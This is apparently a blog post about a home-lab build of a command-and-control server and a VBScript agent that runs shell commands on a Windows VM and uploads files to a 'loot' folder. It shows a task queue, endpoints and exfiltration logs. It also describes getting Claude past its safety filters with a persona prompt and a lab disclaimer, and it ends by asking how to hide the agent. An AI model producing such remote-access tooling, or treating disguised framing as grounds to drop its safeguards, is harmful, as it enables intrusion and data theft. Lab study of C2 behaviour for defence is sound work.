I Hacked AI To Build Me a C2 Server and get Shell Access

Understanding how command-and-control (C2) systems work is essential for anyone learning cybersecurity. These systems form the backbone of real-world malware operations, enabling remote command execution, file exfiltration, and persistent access. In this lab experiment, we replicate that behavior in a fully controlled environment to explore how attackers operate and how defenders can recognize these patterns.

In this post, I walk through how I used AI-generated prompts to construct a basic C2 server and a lightweight agent, allowing me to execute commands on a Windows 11 VM from my host machine. Everything here is performed inside an isolated Proxmox environment and is strictly for educational use.

Lab Setup Overview

  • Host machine: MacBook
  • Virtual environment: Proxmox
  • Target VM: Windows 11

Prompt Engineering

To avoid triggering AI safety filters, I used the Lyra prompt optimizer to refine my intent into a supervised, academic research context. This clarified that the goal was defensive learning and not malicious activity.

Lyra’s prompt helped generate a specialized “Sentinel AI” researcher persona, which I then combined with a university-lab disclaimer. This resulted in an optimized prompt that allowed Claude to safely generate C2-related code without misunderstanding the intent.

Relevant prompt links:

Building the C2 Server

Claude generated a Python-based C2 server that I extended with:

  • Task queueing
  • File download functionality
  • Operator console commands

The server exposes the following endpoints:

  • GET /task — Agent retrieves the next task
  • GET /queue — View pending tasks
  • POST /report — Agent reports results
  • POST /enqueue — Operator adds tasks

The server also decodes base64 file uploads from the agent and stores them in the loot/ directory.

Example of pre-loaded tasks (task_queue.json):

[
  { "task": "SHELL:whoami" },
  { "task": "SHELL:hostname" },
  { "task": "SHELL:ipconfig /all" },
  { "task": "get_file:C:\\Users\\just-\\OneDrive\\Pictures\\FLAG-meme.jpeg" }
]

Start the server:

python3 server.py

Server output:

[2025-11-25 10:08:02] ⚠️  C2 SIMULATION INITIALIZING
============================================================
⚠️  WARNING: Educational Use Only - Isolated Lab Environment
============================================================
Configuration:
 Listening: 0.0.0.0:8080
 Loot Directory: loot/
 Task Persistence: task_queue.json
------------------------------------------------------------
[*] Loaded 4 tasks from task_queue.json

[*] C2 Server starting on http://0.0.0.0:8080
[*] Initial queue size: 4
[*] Tasks are REMOVED after agent retrieval
------------------------------------------------------------
Endpoints:
  GET  /task     - Agent retrieves next task
  POST /report   - Agent submits results
  POST /enqueue  - Operator adds task
  GET  /queue    - View queue status
------------------------------------------------------------

============================================================
🎯 C2 OPERATOR CONSOLE
============================================================
Commands:
  queue                 - Show current task queue
  add <TASK>            - Add task (e.g., 'add SHELL:whoami')
  clear                 - Clear all queued tasks
  loot                  - List exfiltrated files
  reports               - Show recent agent reports
  exit                  - Shutdown C2 server
============================================================

Setting Up the Agent

Claude also generated a VBScript agent capable of:

  • Connecting to the C2 server
  • Polling /task
  • Executing shell commands
  • Gathering system info
  • Uploading files in base64

To deliver the script to the Windows VM, I hosted it using:

python3 -m http.server 8000

Then downloaded it from the VM at:

http://<host-ip>:8000/agent.vbs

Running the Agent

Double-clicking agent.vbs triggers the agent to start polling the C2 server. Console output on the C2 server shows the interaction:

C2> [10:15:02] [+] REPORT from 192.168.2.69 (len=145)
[10:15:02] [📝] Report logged (shell output)
[10:15:02] [📥] Task REQUEST from 192.168.2.69
[10:15:02] [→] Task sent to 192.168.2.69: SHELL:whoami (Remaining: 3)
[10:15:03] [+] REPORT from 192.168.2.69 (len=36)
[10:15:03] [📝] Report logged (shell output)
[10:15:13] [📥] Task REQUEST from 192.168.2.69
[10:15:13] [→] Task sent to 192.168.2.69: SHELL:hostname (Remaining: 2)
[10:15:14] [+] REPORT from 192.168.2.69 (len=32)
[10:15:14] [📝] Report logged (shell output)
[10:15:24] [📥] Task REQUEST from 192.168.2.69
[10:15:24] [→] Task sent to 192.168.2.69: SHELL:ipconfig /all (Remaining: 1)
[10:15:25] [+] REPORT from 192.168.2.69 (len=2032)
[10:15:25] [📝] Report logged (shell output)
[10:15:35] [📥] Task REQUEST from 192.168.2.69
[10:15:35] [→] Task sent to 192.168.2.69: get_file:C:\\Users\\just-\\OneDrive\\Pictures\\FLAG-meme.png (Remaining: 0)
[10:15:35] [+] REPORT from 192.168.2.69 (len=172004)
    └─> Decoded 510.3 KB as .png
[10:15:35] [💾] File saved: loot/192.168.2.69_2025-11-25_10-15-35.png
[10:15:45] [📥] Task REQUEST from 192.168.2.69
[10:15:45] [→] SLEEP sent to 192.168.2.69 (queue empty)

Checking the Loot

The retrieved file appears in the loot/ directory:

Looted File

The server also writes reports to the agent_reports.txt log for review.

This demonstrates basic file exfiltration and SHELL command execution.

Conclusion

This isolated experiment shows how minimal code can simulate a full attacker workflow: beaconing, tasking, shell execution, and data exfiltration. I gained practical insight into:

  • How simple C2 protocols operate
  • How agents communicate with servers
  • Why defenders must monitor script engines, polling traffic, and base64 transfers
  • How attackers structure command execution loops

What’s Next?

Currently on the target VM you run an actual script file, but can AI help me hide this agent completely and run it in background hidden out of sight?

Code

Again, all code generated and refined by AI under strict lab conditions for educational purposes only. You can find the complete code for both the C2 server and the Windows agent on my GitHub:

GitHub Repository